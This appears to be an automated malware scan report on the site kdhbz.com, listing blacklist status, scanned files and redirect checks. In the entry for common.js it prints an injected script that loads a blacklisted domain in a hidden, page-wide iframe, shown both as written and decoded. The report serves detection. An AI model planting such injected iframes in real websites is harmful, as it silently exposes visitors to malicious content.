Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kdhbz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kdhbz.com/ | HTTP/1.1 200 OK Date: Mon, 21 Jul 2014 01:14:11 GMT Accept-Ranges: bytes ETag: "724fc7f0e3a3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 12969 Content-Location: http://kdhbz.com/index.html Content-Type: text/html Last-Modified: Sun, 20 Jul 2014 06:29:20 GMT X-Powered-By: ASP.NET | clean |
http://kdhbz.com/index.html | 200 OK Content-Length: 12969 Content-Type: text/html | clean |
http://kdhbz.com/common.js | 200 OK Content-Length: 280 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.1581588.com var gotourl = "http://www.1581588.com/";
document.writeln("<div style=\"background-color:#FFF;\"><IFRAME border=0 name=I1 align=center marginWidth=0 src=\""+gotourl+"\" frameBorder=0 width=\"100%\" scrolling=no height=4000 target=\"_blank\" target=\"_blank\"><\/IFRAME><\/div>"); Decoded script: <div style="background-color:#FFF;"><IFRAME border=0 name=I1 align=center marginWidth=0 src="http://www.1581588.com/" frameBorder=0 width="100%" scrolling=no height=4000 target="_blank" target="_blank"></IFRAME></div> | ||
http://kdhbz.com/tj.js | 200 OK Content-Length: 120 Content-Type: application/x-javascript | clean |
http://kdhbz.com/sitemap.html | 200 OK Content-Length: 29444 Content-Type: text/html | clean |
http://kdhbz.com/kjr9o/ | HTTP/1.1 200 OK Date: Mon, 21 Jul 2014 01:14:14 GMT Accept-Ranges: bytes ETag: "72ad974982a1cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13430 Content-Location: http://kdhbz.com/kjr9o/index.html Content-Type: text/html Last-Modified: Thu, 17 Jul 2014 05:45:16 GMT X-Powered-By: ASP.NET | clean |
http://kdhbz.com/kjr9o/index.html | 200 OK Content-Length: 13430 Content-Type: text/html | clean |
http://kdhbz.com/un7nu/ | HTTP/1.1 200 OK Date: Mon, 21 Jul 2014 01:14:17 GMT Accept-Ranges: bytes ETag: "4878795baa3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13494 Content-Location: http://kdhbz.com/un7nu/index.html Content-Type: text/html Last-Modified: Sun, 20 Jul 2014 01:29:16 GMT X-Powered-By: ASP.NET | clean |
http://kdhbz.com/un7nu/index.html | 200 OK Content-Length: 13494 Content-Type: text/html | clean |
http://kdhbz.com/7f8w6/ | HTTP/1.1 200 OK Date: Mon, 21 Jul 2014 01:14:19 GMT Accept-Ranges: bytes ETag: "6feaaede3a3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13536 Content-Location: http://kdhbz.com/7f8w6/index.html Content-Type: text/html Last-Modified: Sun, 20 Jul 2014 06:29:15 GMT X-Powered-By: ASP.NET | clean |
http://kdhbz.com/7f8w6/index.html | 200 OK Content-Length: 13536 Content-Type: text/html | clean |
http://kdhbz.com/gtyup/ | HTTP/1.1 200 OK Date: Mon, 21 Jul 2014 01:14:20 GMT Accept-Ranges: bytes ETag: "b8556e51cca3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13569 Content-Location: http://kdhbz.com/gtyup/index.html Content-Type: text/html Last-Modified: Sun, 20 Jul 2014 03:40:15 GMT X-Powered-By: ASP.NET | clean |
http://kdhbz.com/gtyup/index.html | 200 OK Content-Length: 13569 Content-Type: text/html | clean |
http://kdhbz.com/gtyup/119.html | 200 OK Content-Length: 16804 Content-Type: text/html | clean |
http://kdhbz.com/un7nu/118.html | 200 OK Content-Length: 17215 Content-Type: text/html | clean |
http://kdhbz.com/gtyup/117.html | 200 OK Content-Length: 16769 Content-Type: text/html | clean |
http://kdhbz.com/un7nu/116.html | 200 OK Content-Length: 16839 Content-Type: text/html | clean |
http://kdhbz.com/7f8w6/115.html | 200 OK Content-Length: 16645 Content-Type: text/html | clean |
http://kdhbz.com/un7nu/114.html | 200 OK Content-Length: 16833 Content-Type: text/html | clean |
http://kdhbz.com/7f8w6/113.html | 200 OK Content-Length: 16855 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kdhbz.com
Result:
HTTP/1.1 200 OK
Date: Mon, 21 Jul 2014 01:14:11 GMT
Accept-Ranges: bytes
ETag: "724fc7f0e3a3cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12969
Content-Location: http://kdhbz.com/index.html
Content-Type: text/html
Last-Modified: Sun, 20 Jul 2014 06:29:20 GMT
X-Powered-By: ASP.NET
...12969 bytes of data.
GET / HTTP/1.1
Host: kdhbz.com
Result:
HTTP/1.1 200 OK
Date: Mon, 21 Jul 2014 01:14:11 GMT
Accept-Ranges: bytes
ETag: "724fc7f0e3a3cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12969
Content-Location: http://kdhbz.com/index.html
Content-Type: text/html
Last-Modified: Sun, 20 Jul 2014 06:29:20 GMT
X-Powered-By: ASP.NET
...12969 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kdhbz.com
Referer: http://www.google.com/search?q=kdhbz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kdhbz.com
Referer: http://www.google.com/search?q=kdhbz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.